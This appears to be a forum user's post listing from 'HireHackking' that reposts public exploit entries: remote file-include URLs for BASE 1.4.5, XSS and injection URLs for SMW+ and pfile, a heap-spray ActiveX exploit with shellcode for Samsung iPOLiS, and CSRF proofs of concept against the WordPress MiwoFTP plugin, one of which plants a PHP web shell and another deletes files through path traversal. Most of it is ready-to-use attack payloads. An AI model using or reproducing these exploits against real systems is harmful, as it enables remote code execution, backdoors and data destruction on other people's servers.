Everything posted by HireHackking

  1. source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/setup/base_conf_contents.php?BASE_Language=[EV!L]
  2. source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/includes/base_state_common.inc.php?GLOBALS[user_session_path]=[EV!L]
  3. source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/setup/setup2.php?ado_inc_php=[EV!L]
  4. source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_ag_main.php?BASE_path=[EV!L]
  5. source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_qry_alert.php?BASE_path=[EV!L]
  6. source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_qry_common.php?BASE_path=[EV!L]
  7. source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_stat_class.php?BASE_path=[EV!L]
  8. source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_stat_alerts.php?BASE_path=[EV!L]
  9. source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_stat_common.php?BASE_path=[EV!L]
  10. source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_stat_ipaddr.php?BASE_path=[EV!L]
  11. source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_stat_sensor.php?BASE_path=[EV!L]
  12. source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_stat_uaddr.php?BASE_path=[EV!L]
  13. source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_stat_time.php?BASE_path=[EV!L]
  14. source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_user.php?BASE_path=[EV!L]
  15. <html> <!-- Vendor Homepage: https://www.samsung-security.com/Tools/device-manager.aspx Samsung iPOLiS 1.12.2 ReadConfigValue Remote Code Execution (heap spray) CVE: 2015-0555 Author: Praveen Darshanam http://blog.disects.com/2015/02/samsung-ipolis-1122-xnssdkdeviceipinsta.html http://darshanams.blogspot.com/ Tested on Windows XP SP3 IE6/7 Thanks to Peter Van Eeckhoutte for his wonderfull exploit writing tutorials --> <object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object> <script> var shellcode = unescape('%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u4100'); var bigblock = unescape('%u9090%u9090'); var headersize = 20; var slackspace = headersize + shellcode.length; while (bigblock.length < slackspace) bigblock += bigblock; var fillblock = bigblock.substring(0,slackspace); var block = bigblock.substring(0,bigblock.length - slackspace); while (block.length + slackspace < 0x40000) block = block + block + fillblock; var memory = new Array(); for (i = 0; i < 500; i++){ memory[i] = block + shellcode } // SEH and nSEH will point to 0x06060606 // 0x06060606 will point to (nops+shellcode) chunk var hbuff = ""; for (i = 0; i <5000; i++) { hbuff += "\x06"; } // trigget crash target.ReadConfigValue(hbuff); </script> </html>
  16. source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/index.php?BASE_path=[EV!L]
  17. source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/admin/base_useradmin.php?BASE_path=[EV!L]
  18. source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/admin/index.php?BASE_path=[EV!L]
  19. source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. http://www.example.com/base_ag_main.php?ag_action=create File and paste your code
  20. WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit Vendor: Miwisoft LLC Product web page: http://www.miwisoft.com Affected version: 1.0.5 Summary: MiwoFTP is a smart, fast and lightweight file manager plugin that operates from the back-end of WordPress. Desc: Input passed to the 'selitems[]' parameter is not properly sanitised before being used to delete files. This can be exploited to delete files with the permissions of the web server using directory traversal sequences passed within the affected POST parameter. Tested on: Apache 2.4.10 (Win32) PHP 5.6.3 MySQL 5.6.21 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5240 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5240.php Vendor: http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog 24.03.2015 -- <html> <body> <form action="http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=post" method="POST"> <input type="hidden" name="do_action" value="delete" /> <input type="hidden" name="first" value="y" /> <input type="hidden" name="selitems[]" value="../../../../../pls_mr_jailer_dont_deleteme.txt" /> <input type="submit" value="Gently" /> </form> </body> </html>
  21.  WordPress MiwoFTP Plugin 1.0.5 Multiple CSRF XSS Vulnerabilities Vendor: Miwisoft LLC Product web page: http://www.miwisoft.com Affected version: 1.0.5 Summary: MiwoFTP is a smart, fast and lightweight file manager plugin that operates from the back-end of WordPress. Desc: MiwoFTP WP Plugin suffers from multiple cross-site request forgery and xss vulnerabilities. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Input passed to several GET/POST parameters is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Apache 2.4.10 (Win32) PHP 5.6.3 MySQL 5.6.21 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5241 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5241.php Vendor: http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog 24.03.2015 -- GET: (params: dir, item, order, srt) ------------------------------- /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=list&dir=wp-content"><script>alert(1)</script>&order=name&srt=yes /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=wp-content%2Fuploads&item=test.php"><img%20src%3da%20onerror%3dalert(2)>&order=name&srt=yes /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=search&order=name"><script>alert(3)</script>&srt=yes&searchitem=test&subdir=y /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=search&order=name&srt=yes"><script>alert(4)</script> --- POST: (params: code, fname, new_dir, newitems[], searchitem, selitems[]) ------------------------------------------------------------------ 
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=edit&dir=wp-content%2Fuploads%2F2015&item=test.php&order=name&srt=yes - dosave=yes&code="><script>alert(1)</script>&fname=test.php /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=edit&dir=wp-content%2Fuploads%2F2015&item=test.php&order=name&srt=yes - dosave=yes&code=1&fname=test.php"><img%20src%3da%20onerror%3dalert(2)> /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=post&dir=wp-content%2Fuploads&order=name&srt=yes - do_action=copy&confirm=false&first=n&new_dir=wp-content%2Fuploads%2F1"><script>alert(3)</script>&selitems%5B%5D=test&newitems%5B%5D=test.php /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=post&dir=wp-content%2Fuploads&order=name&srt=yes - do_action=copy&confirm=false&first=n&new_dir=wp-content%2Fuploads%2F2015&selitems%5B%5D=test&newitems%5B%5D=test.php"><script>alert(4)</script> /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=search&order=name&srt=yes - searchitem=test"><script>alert(5)</script>&subdir=y /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=arch&dir=wp-content%2Fuploads&order=name&srt=yes - selitems%5B%5D=test.zip"><script>alert(6)</script>&name=test&type=zip
  22.  WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Creation Exploit (RCE) Vendor: Miwisoft LLC Product web page: http://www.miwisoft.com Affected version: 1.0.5 Summary: MiwoFTP is a smart, fast and lightweight file manager plugin that operates from the back-end of WordPress. Desc: MiwoFTP WP Plugin suffers from a cross-site request forgery remote code execution vulnerability. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions like executing arbitrary PHP code by uploading a malicious PHP script file, with administrative privileges, if a logged-in user visits a malicious web site. Tested on: Apache 2.4.10 (Win32) PHP 5.6.3 MySQL 5.6.21 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5242 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5242.php Vendor: http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog 24.03.2015 -- RCE CSRF PoC for masqueraded payload for admin view when editing: Logic error: When admin clicks on malicious link the plugin will: 1. Search existing file for edit: action=edit&dir=/&item=wp-comments-post.php. 2. In the root folder of WP, file wp-comments.php is created. 3. Payload is an excerpt from wp-comments-post.php without '<?php' part (SE+HTMLenc). 4. Somewhere below in that code, the evil payload: <?php system($_GET['c']); ?> is inserted. 5. Admin is presented with interface of editing wp-comments.php with contents from wp-comments-post.php. 6. After that, no matter what admin clicks (CSRF) (Save, Reset or Close), backdoor file is created (wp-comments.php). 7. 
Attacker executes code, ex: http://localhost/wordpress/wp-comments.php?c=whoami <html> <body> <form action="http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=edit&dir=/&item=wp-comments-post.php&order=name&srt=yes" method="POST"> <input type="hidden" name="dosave" value="yes" /> <input type="hidden" name="code" value="/** * Handles Comment Post to WordPress and prevents duplicate comment posting. * * @package WordPress */ if ( 'POST' != $_SERVER['REQUEST_METHOD'] ) { header('Allow: POST'); header('HTTP/1.1 405 Method Not Allowed'); header('Content-Type: text/plain'); exit; } /** Sets up the WordPress Environment. */ require( dirname(__FILE__) . '/wp-load.php' ); nocache_headers(); $comment_post_ID = isset($_POST['comment_post_ID']) ? (int) $_POST['comment_post_ID'] : 0; $post = get_post($comment_post_ID); if ( empty( $post->comment_status ) ) { /** * Fires when a comment is attempted on a post that does not exist. * * @since 1.5.0 * * @param int $comment_post_ID Post ID. */ do_action( 'comment_id_not_found', $comment_post_ID ); exit; } // get_post_status() will get the parent status for attachments. $status = get_post_status($post); $status_obj = get_post_status_object($status); if ( ! comments_open( $comment_post_ID ) ) { /** * Fires when a comment is attempted on a post that has comments closed. * * @since 1.5.0 * * @param int $comment_post_ID Post ID. */ do_action( 'comment_closed', $comment_post_ID ); wp_die( __( 'Sorry, comments are closed for this item.' ), 403 ); } elseif ( 'trash' == $status ) { /** * Fires when a comment is attempted on a trashed post. * * @since 2.9.0 * * @param int $comment_post_ID Post ID. */<?php system($_GET['c']); ?> /* Filler */ by LiquidWorm, 2015" /> <input type="hidden" name="fname" value="wp-comments.php" /> <input type="submit" value="Submit form" /> </form> </body> </html> --- http://localhost/wordpress/wp-comments.php?c=whoami
  23. source: https://www.securityfocus.com/bid/51980/info SMW+ is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input. Attacker-supplied HTML and script code can run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. SMW+ 1.5.6 is vulnerable; other versions may also be affected. http://www.example.com/index.php/Special:FormEdit?target=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F&categories=Calendar+
  24. source: https://www.securityfocus.com/bid/51982/info pfile is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. pfile 1.02 is vulnerable; other versions may also be affected. http://www.example.com/pfile/kommentar.php?filecat=[xss]&fileid=0
  25. source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_stat_ports.php?BASE_path=[EV!L]